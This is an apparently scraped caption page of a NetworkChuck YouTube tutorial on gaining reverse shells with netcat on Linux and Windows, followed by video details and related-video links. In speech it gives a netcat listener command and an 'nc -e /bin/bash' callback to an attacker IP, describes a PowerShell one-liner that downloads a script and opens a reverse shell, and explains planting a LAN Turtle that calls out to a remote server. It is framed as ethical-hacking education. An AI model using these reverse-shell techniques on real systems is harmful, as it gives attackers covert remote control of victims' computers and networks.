how to get remote access to your hacking targets // reverse shells with netcat (Windows and Linux!!)

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
net cat or netcat it's a tool we can use to gain remote access to our hacking targets and look at that yes it worked it's amazing in this video i'm gonna show you how to do it i'm gonna show you what netcat is and how we can use it to gain a reverse shell on linux and windows machines so this is scary dude and also what the junk is a reverse shell we'll talk about that and bonus check this out we're going to play with this guy it's a land turtle from hack five it's a wicked awesome hacking device that we can use just to plug into a network just plug it in walk away and we have remote access also do you want one of these i'm going to give away two of these in this video stick around till the end and i'll tell you how to enter the contest and as always when i'm showing you these hacking tools this is for educational purposes only you do not have permission to hack anyone for any reason so just don't do it but i do want you to try this on yourself i want you to try it on your own home network why well because it's fun and it's also a skill that you need if you want to become an ethical hacker a pen tester or whatever and it's something you'll use on ctfs on try hack me hack the box all the time so you got to know how to do this and shout out to bitdefender for sponsoring this video we'll talk more about them here in a bit but first let's start hacking but hold on what do we need for hacking we need coffee don't we let's go get some coffee [Music] all right got my coffee let's start hacking oh and also have you hacked the youtube algorithm today let's make sure you do hit that like button comment notification bell all that youtube stuff let's hack youtube today ethically of course okay apart from coffee what else do you need to actually walk through this hack let me show you the first thing you'll need is a target system which will actually be you it'll be a computer in your home network now ideally you're going to have a linux computer and a windows computer so we can have fun and test both and they don't have to be physical computers they can be virtual machines and if you have no idea what those are or how to set those up i got a video right here check it out now for this you'll want a computer outside of your home network how do you do that the cloud man that's the easiest way to do it for that you do have a ton of options but i'm going to walk you through one of my favorite cloud providers lenode and if you use my code network chuck when you first sign up you'll get 100 free credit so this should be free for you okay first let's talk about what we're doing because i said we're getting remote access into a computer and we're going to be using something called a reverse shell but what does that mean here is our hacking target and your hacking target is going to be again inside your home network and keeping in mind for the most part the home network is keeping your target safe because in most cases you have a router in your home network right and built into that router is a firewall and it makes it pretty hard for us hackers to attack anything inside that network remember our goal here is to remotely access our target when i say access i mean i want to be able to log in to like a command line a shell and enter commands and do stuff that's the ultimate goal but again the firewall will block most connections trying to come in to your home network protecting your target and the same thing does apply to most enterprise networks we can't get in because the firewall blocks things so since we can't connect to our target and access his shell what if we had our target connect to us what yeah that's what a reverse shell is where instead of us trying to connect to him he connects to us but how do we do that and why why are we doing that well first start with why are we doing it and we'll get to how we do it yes the firewall is blocking most inbound connections blocking us but you know what he's not blocking he's not blocking connections going out or most of them anyway so for example when our target wants to visit a website the firewall's like yeah man come on through you're good you're trusted you're coming from inside the network so if we could get our target to connect to us that connection shouldn't be blocked okay sounds cool in theory but chuck how do we do that netcat that's how we do it check it out it's really cool now netcat is not a new tool it's been around for a long time and it's not just used for hacking it's often called the swiss army network knife something right no what's it called oh the network swiss army knife yeah that's what they call it networking system admins often use this to scan networks similar to nmap you can transfer files and do some cool stuff like it's a powerful tool but the most popular use is for reverse shells so let's make this happen here's our first scenario our target will be a linux system the attacking machine will be our cloud machine which i'm going to set up on lenode this actually won't change this will be the same thing for all scenarios so let's go set up lenode so navigate to lenode.com or check that link in the description and get you an account or just sign in once you're in i'm going to click on create at the top left here and lenode it's basically a virtual machine and the cloud if you're not familiar with this now for this we won't need much i want to change my distribution to ubuntu 18. it's just one of my favorites i like it 1804 there we go it's like my region by plan i'll make the smallest one one gig it's only five dollars a month that's awesome and again if you have the 100 free credit it's free anyways i will name it put in my password and click on create that wasn't so bad right like the sucker's ready well almost it's provisioning so perfect time for a coffee break i know i'm drinking espresso totally out of character for me but it's good okay my machine is running because it says it right there i'm gonna copy my ssh access right here i'm going to launch my terminal it's going to launch cmd on windows and i will get logged in ssh at the ip now the beautiful part about netcat is that it's installed on most linux distros by default so if we try to use it real quick the command will be nc just typing in nc it's already installed so i have to worry about that now i didn't mention this before but for our attack right now on this scenario we will need netcat installed on both the attacking system and the target system but since we have a linux machine attacking a linux machine they should both have netcat and in my situation i have kali linux as my target which is flipping the script a bit take that cali anyways now again because this is a reverse shell things are a bit backwards as the attacker we're not going to attempt to connect anything we're actually going to wait for a connection to us but we have to wait we have to listen and that's our first task we're going to set up a listener we're going to use a netcat command that basically says hey we're listening for a connection for anyone to come here and we're going to specify a certain port that we're listening on let's try it out real quick it's very very simple too the command will be nc for netcat and we're going to use a few switches here a few options so i'll hit dash or tac l n v p l is for listening hey can you hear me that's the mode we're putting that cat in actually the l should be lower case case sensitivity is very important in linux n is for no dns we're only using ip addresses v is for verbose we're telling netcat whatever happens tell us everything that's happening don't hold back and then p is for port which we're gonna specify right after that switch so let's do it right now now here it can really be any port you want but your best bet to avoid any firewall detection is to keep it under the 1000 well-known ports or keep it under a thousand for me i'm going to try out using port 87. now in most cases this would be it that's all you have to do but for our lenode box here it does have quite a few interfaces so we have to tell it which interface to actually do this on so that will specify the ip address so we'll do dash or tick s for source and then the ip address of our box here and we just connected to that so we should already know it but i forgot it so i'm going to go to my lenode and copy it paste it in there and that's it so we're going to do here watch we'll hit enter and he's listening he's ready he's like uh what was that did you you say anything he's waiting he's waiting so now we have to get our target to actually connect to us let's try that here i'm going to be using my kali linux machine voldemort he who must not be named here the command will be nc and then we'll do tack or switch e now i will say the dash e option isn't available on most linux distros this is what's referred to as the traditional version of netcat and i found that dash e doesn't exist anywhere it's kind of considered an insecure thing which makes sense but we're going to use dash e to specify our shell we're going to use so or the shell i'm offering to my attacker here attack me it'll be forward slash bin forward slash bash so if you're using cali or something similar this should work great if it doesn't just don't use the dash e switch you should be fine and then the ip address i'm gonna paste that this is the ip address of the attacker our cloud machine and then the port that we set earlier port 87 and we're going to hit enter this is it this is it ready go what happened nothing happened here we have to go look at our other machine here and look at that yes it worked ah yes connection from our home network the victim has successfully connected to the attacker we tricked him but how do we use it what's it look like let's try it we're already there we just got to hit enter a few times let's try to type in some commands like who am i oh i'm network chuck um let's ls oh we can see what's inside there let's do you name a we can see what the system's about so we we're in there we have control we successfully have a reverse shell that's awesome right but you might be wondering this how do we get our target machine to enter this command to try and connect to us well in a lot of cases this command we have the nmap or the netcat command it could be contained within a script that we somehow get installed on that machine using other hacking methods maybe it's a phishing email they open it and it's just automatically added to their machine and it runs automatically these are often referred to as payloads and it may not be as simple as like an nc or netcat command it might be something crazy using metasploit or interpreter or all kinds of stuff but that's the gist you would somehow get something on that computer to remotely connect to you using a script like this and in case you're wondering this is a basic form of what's called a rat or a remote administration tool it's what hackers use to gain remote access to their victims so your grandma checking her email she clicks on that link it downloads something that script could be a rat that is making an outbound connection through her firewall and the firewall's like cool yeah you're you're leaving you're good you're fine connect to the attacker we don't know it's an attacker but the rat does that's how these things happen let me ask you a question how do you know if your grandma doesn't already have a rat on her computer actually shoot how do you know you don't have a right on your computer or your friends or your family the simple fact is you probably don't know unless you have something monitoring and protecting your computers you're gonna need something like the sponsor of this video bitdefender now i just installed the sucker on my computer look at this three threats already blocked it actually found a malicious file with a junk so if you're looking for a way to protect you and your family from rats and malware and all kinds of crazy stuff and also to find out maybe you already might have one check out bitdefender total security malicious software like worms trojans rootkits spyware ransomware it's got your back it'll find it you can also look at the network traffic of your computer analyze it and go huh that'll look right let's stop that stop it before something bad happens like i don't know maybe an attacker gets a reverse shell to your computer it can do that it'll also help out with spam and phishing attacks all things that plague our families aren't very tech savvy i mean just yesterday actually was that today my wife's like hey can i click on this link is this a fraud it was and she almost clicked on it bitdefender will actually prevent those links from opening from downloading the stuff bad stuff so anyways total security it does all the stuff i mentioned and a lot more if you want to check it out link below if you use my link you do get 120 days of free protection for five devices so give it a try show some love to bitdefender for sponsoring this video and helping me do more of this yeah because it's a dangerous world out there now your grandma probably isn't using linux right she's probably using windows most people use windows as their desktop computer so let's test out doing this on windows which is really kind of scary and really cool so now for scenario two again the attacker's gonna be the same as before we're gonna run the exact same command same story whatever but now our target is gonna be windows this is crazy now for windows we do have a few options you can actually install netcat on windows so that's one way to do it run netcat like we did on linux on windows but i think something even more nefarious is to run something built in all windows systems have something called powershell built into them it's like command line and we can use powershell to connect to us the attacker so let's get our attacking machine set up first now i will say this the command will be the same but just a little bit different because we're attacking windows i'll show you and this is actually fantastic um this is a github repository you need to check it out i got a link below it's called payloads all the things and um essentially it shows you how to execute all these scripts on all the different platforms you can do it in python ruby powershell that's what we care about right it's really awesome so i know my powershell thing is all the way at the bottom here all the way down here bam fully interactive reverse shell on windows scary let's try it so on the server side this is what we want now i'm not going to copy the whole thing all i want right now is this first bit right before that bracket here what do you call that my brain's melted i don't know what it's called i'm gonna copy all this right here and paste that into my server then i'll put that bracket in there oh i gotta google it now what is that called okay brain unmelted it's called a pipe duh pipe oh my gosh sometimes do you forget crap all the time sometimes that's me and just after the pipe i'm gonna use that same command the ncat command ncat netcat and c-l-v-n-p our port for 87 and then dash s for our source and we'll specify our ip address now all this right here i'm not going to talk about that that's a video for another time just trust me it works trust me blindly so we're going to hit enter and we're going to start listening we're listening now for the window side and it's it's so cool and scary at the same time client side i'm going to copy this right here i'm going to open up a text editor just open up notepad paste that so i can change some information on it really just two things at the end here the ip address that we're going to connect to which will be our attacker and then the port which was port 87. so i'm going to copy all that and launch powershell so to launch powershell on windows just do uh command s search for powershell there she is now yours might be blue mine is black because i changed it i like black and now we're gonna paste our command so it just did something um now i think it worked but what just happened here is that command actually went out and downloaded this powershell script notice it's from github um the uh extension is ps1 that's what you'll see for powershell scripts and it did it so let's go look back at our server and see if things happened it did so this is scary dude check this out here's where we were running our command and we're listening the connection came in and boom we're suddenly in powershell we're suddenly on my computer what what that's nuts if i just type in like no dur i can see all my stuff i mean i i can do anything i want that's crazy right now if you're tracking with me here here's what we did again we set up a listener using netcat we're saying yes we are listening we have our server ready and then using built-in powershell we ran a command that downloaded the script that initiated a connection out to us we listened we heard we accepted the connection and that gave us shell access a reverse shell a reverse power shell into that windows machine that's cool that's awesome now there is a lot more to the world of netcat and creating reverse shells it's a whole thing what i'm hoping is that this what you saw here gives you just that that itch to start just digging deeper and trying it out for yourself again this is a skill that you'll use a lot in cts on try hack me hack the box all those websites and also something you'll use as a professional pen tester or an ethical hacker now there is one more thing i want to show you and that's this guy right here a land turtle this little guy doesn't look like anything really just like a dongle a dongle you might see laying around it's actually a little linux computer isn't that cool it's a linux computer powered via usb has an ethernet port on the other side but lurking underneath the shell the turtle shell here is a ton of hacking tools one hacking tool in particular that we're talking about right here you guessed it man there's netcat on this sucker it's awesome okay cool it's a little linux box it has netcat but how do we use it like this check this out now again this little guy can do so much more than what i'm about to show you but because we're talking about netcat i want to show you netcat this thing can be powered via a little usb power bank so here's the scenario let's say you're pen testing a network and let's say you're on site at the business and you see on the wall over there hey what's that oh it's an ethernet port or maybe you see a switch oh a switch i want to slowly get out my land turtle plug it in plug it into the switch plug it into my usb power bank hide it behind something where people can't see it and then leave you're done go home because yeah buddy you've got remote access to that network so we have our turtle in place of the network and now we need to listen for his connections we're going to run our same command now i'm going to remove all the windows specific stuff just going to keep the nc-lvnp87 all that stuff we're going to start listening now what's cool about this land turtle because i have net cat running on it it's actually got a script that's reaching out to my server constantly as soon as it comes up and boom connection received now i'm going to hide this ip address because it's actually my real home ip address but dude here's a scenario someone snuck into my house on my home network and plugged a freaking turtle into it that turtle because it has a netcat running on it broke through my firewall it connected to an attacking pc and now this attacking pc can run any command he wants off of this little linux machine this land turtle like watch we can like run things like nmap we can discover crap ready well i tried who am i didn't work we'll do nmap tick s t and i'll do a subnet or i'll do an ip range and watch what happens now this is crazy right like i'm logged in or i'm reverse shell into this turtle here and it's hidden it's hidden you can't see it and i have access to the network it's connected to that's a little crazy there it goes it finished again this land turtle can do a lot more i am giving away two of these check it out link below it's gonna be a little contest now to enter the contest you will need a secret phrase a secret code the code is going to be given right now it is the network chuck turtle all one word just like the way you see it on the screen you will need that to end of the contest but yeah reverse shells they're kind of crazy right they are a common way that hackers will use to get into a machine to have access to it remotely but anyways that's about it guys let me know what you think of the video in the comments below um did you try this did you have fun let me know do you have any questions do you need help also let us know in the comments below and don't forget i do have a walk through a guide in the description so if you'd like to follow along and want to be able to copy commands and stuff i got it there and of course don't forget to hack that youtube algorithm hit that like button notification bell comment subscribe we gotta hack youtube today but we gotta do it ethically like everything we do yep that's about it i'll catch you guys next time that's cool i'm not drinking that anyways [Music] you
Info
Channel: NetworkChuck
Views: 602,738
Rating: undefined out of 5
Keywords: Rat, remote access tool, netcat, ncat, ethical hacking, network chuck, networkchuck, lan turtle, hak5, reverse shell, reverse powershell
Id: bXCeFPNWjsM
Channel Id: undefined
Length: 20min 7sec (1207 seconds)
Published: Thu Jul 08 2021
Related Videos
Phishing attacks are SCARY easy to do!! (let me show you!) // FREE Security+ // EP 2
NetworkChuck
1.3M
Cryptocurrency Mining on a Raspberry Pi (it's fun....trust me)
NetworkChuck
854K
Using My Python Skills To Punish Credit Card Scammers
Engineer Man
2M
HELPDESK - how to get started in IT (your first job)
NetworkChuck
283K
let's hack your home network // FREE CCNA // EP 9
NetworkChuck
1.9M
you need to learn Virtual Machines RIGHT NOW!! (Kali Linux VM, Ubuntu, Windows)
NetworkChuck
3.2M
how Hackers SNiFF (capture) network traffic // MiTM attack
NetworkChuck
840K
Ex-NSA hacker tools for real world pentesting
David Bombal
209K
you need to create a Cryptocurrency RIGHT NOW!! (Solana token)
NetworkChuck
142K
i built a Raspberry Pi SUPER COMPUTER!! // ft. Kubernetes (k3s cluster w/ Rancher)
NetworkChuck
744K
bad USBs are SCARY!! (build one with a Raspberry Pi Pico for $8)
NetworkChuck
589K
Nmap Tutorial to find Network Vulnerabilities
NetworkChuck
1.2M
Linux for Ethical Hackers (Kali Linux Tutorial)
freeCodeCamp.org
2.9M
learn to HACK (the best way) // ft. John Hammond
NetworkChuck
525K
access EVERYTHING from your web browser!! (Linux and Windows Desktop, SSH) // Guacamole Install
NetworkChuck
508K
HOW TO MAKE A SUPER EXTENSION CORD! (Perfect for Christmas!)
Stud Pack
1M
apt, dpkg, git, Python PiP (Linux Package Management) // Linux for Hackers // EP 5
NetworkChuck
288K
my SUPER secure Raspberry Pi Router (wifi VPN travel router)
NetworkChuck
367K
learning hacking? DON'T make this mistake!! (hide yourself with Kali Linux and ProxyChains)
NetworkChuck
1.5M
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.